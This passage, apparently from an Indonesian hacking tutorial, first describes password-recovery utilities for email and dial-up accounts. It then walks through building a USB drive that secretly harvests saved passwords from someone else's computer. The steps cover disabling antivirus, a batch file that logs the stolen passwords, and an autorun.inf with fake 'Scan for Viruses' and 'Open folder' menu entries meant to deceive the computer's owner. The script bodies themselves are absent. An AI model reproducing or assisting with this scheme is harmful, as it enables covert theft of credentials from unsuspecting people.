menampilkan password dan informasi akun lain. email clients
yang dapat ditampilkan oleh aplikasi berukuran mini ini
diantaranya:
• Outlook Express
• Microsoft Outlook 2000 (akun POP3 dan SMTP)
• Microsoft Outlook 2002/2003/2007 (POP3, IMAP,
HTTP dan SMTP)
• Windows Mail
• Windows Live Mail
• IncrediMail
• Eudora
• Netscape 6.x/7.x (bila password tidak dienkrip)
• Mozilla Thunderbird (bila password tidak dienkrip)
• Group Mail Free
• Yahoo! Mail (jika password disimpan di aplikasi Yahoo!
Messenger)
• Hotmail/MSN mail (jika password disimpan di aplikasi
MSN/Windows/Live Messenger)
• Gmail (jika password disimpan oleh Gmail Notifier,
Google Desktop, atau Google Talk.
For each email account, the following fields are displayed:
Account Name, Application, Email, Server, Server Type
(POP3/IMAP/SMTP), User Name, and the Password.
52. 52
Dialupass
Description
When you use the "Dial-Up Networking" module for connecting
to the internet or to other networks, the operating system give
you the option to store the password and use it when it needed.
Although the password is constantly stored in your computer,
the operating system doesn't allow you to watch it. if you forget
your password and you want to extract it from your computer,
you can use the Dialupass utility for viewing the password.
This utility enumerates all Dial-Up entries on your computer and
reveals their logon details: User Name, Password and Domain.
it works perfectly in the following operating systems: Windows
95, Windows 98, Windows ME, Windows NT, Windows 2000,
and Windows XP. In Windows 2000 and Windows XP, the
Dialupass utility can reveal the Dial-Up passwords only if you
are logged on with administrator privileges.
System Requirements:
Semua versi Windows, dari Windows 98 hingga Windows
Vista.
Kekurangan:
Pada Windows 2000/XP/2003: passwords dapat ditampilkan
jika log in sebagai user setingkat administrator.
Pada Windows 95, nomer telepon tidak muncul.
53. 53
Dengan menggunakan tools di atas dan sebuah USB FlashDisk
anda dapat membuat sendiri sebuah rootkit untuk cracking.
Keren kan??
Berikut ini adalah langkah-langkah untuk menjadikan USB
FlashDisk anda sebagai senjata perampok password. Demi
kelancaran anda perlu mematikan antivirus anda karena
kemungkinan false alarm.
Kopi semua file executeable (iepv.exe, mailpv.exe,
passwordfox.exe) ke USB FlashDisk anda. Kemudian buat
batch file untuk menjalankan semua aplikasi pencuri password
tersebut. Untuk itu buka notepad dan masukan key berikut:
Perintah (script) di atas akan menjalankan iepv.exe, mailpv.exe,
passwordfox.exe dan mencatat semua password yang
diperoleh ke file teks dengan nama yang anda tentukan, pada
contoh “Mozilla Firefox_Password.txt”
Setelah anda mengetikkan script diatas, simpan notepad
sebagai “launch.bat” tanpa tanda petik.
Untuk menjalankan launch.bat secara otomatis saat USB
FlashDisk menancap kita membutuhkan file autorun.inf, untuk
itu buka notepad dan buat autorun dengan mengetik script
berikut:
54. 54
Saya akan menjelaskan arti script di atas. Script tersebut
memerintahkan sistem untuk menjalankan file launch.bat, dan
sebagai cadangan dengan script shellexecute kita dapat
menjalankan launch.bat dari pop-up menu autoplay. Dengan
mengklik menu “Open folder to view files ” sebenarnya kita telah
menjalankan launch.bat, ini untuk menipu si pemilik computer,
bila ia ada di sisi anda. Dan sebagai cadangan lagi (duh, saya
paranoid sekali) script Shell berguna untuk menambah opsi baru
pada menu bar file atau popup ketika anda melakukan klik
kanan pada USB FlashDisk. Opsi tambahan itu adalah Explore,
Open, Scan for Viruses..., ktiga opsi ini tidak lain dan tidak bukan
akan menjalankan file launch.bat milik kita :P.
Jika anda berminat anda dapat mengubah file launch.bat menjadi file
executeable (launch.exe) menggunakan BatToExeConverter